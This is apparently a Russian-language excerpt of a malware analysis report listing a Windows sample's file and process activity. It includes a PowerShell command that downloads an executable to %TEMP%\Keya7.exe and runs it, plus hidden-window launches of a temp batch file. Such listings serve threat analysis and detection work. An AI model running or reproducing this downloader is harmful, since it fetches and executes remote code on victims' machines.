Техническая информация
- $cdcjwgij как %temp%\keya7.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Dvcfyyc([String] $Cdcjwgij){(New-Object System.Net.WebClient).DownloadFile($Cdcjwgij,''%TEMP%\Keya7.exe'');Start-Process ''%TEMP%\Keya7.exe'';}try{Dvcfyyc(...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1404
- %TEMP%\qlcda_aipw.bat
- %TEMP%\985801.cvr
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Dvcfyyc([String] $Cdcjwgij){(New-Object System.Net.WebClient).DownloadFile($Cdcjwgij,''%TEMP%\Keya7.exe'');Start-Process ''%TEMP%\Keya7.exe'';}try{Dvcfyyc(...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Qlcda_aipw.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Qlcda_aipw.bat" "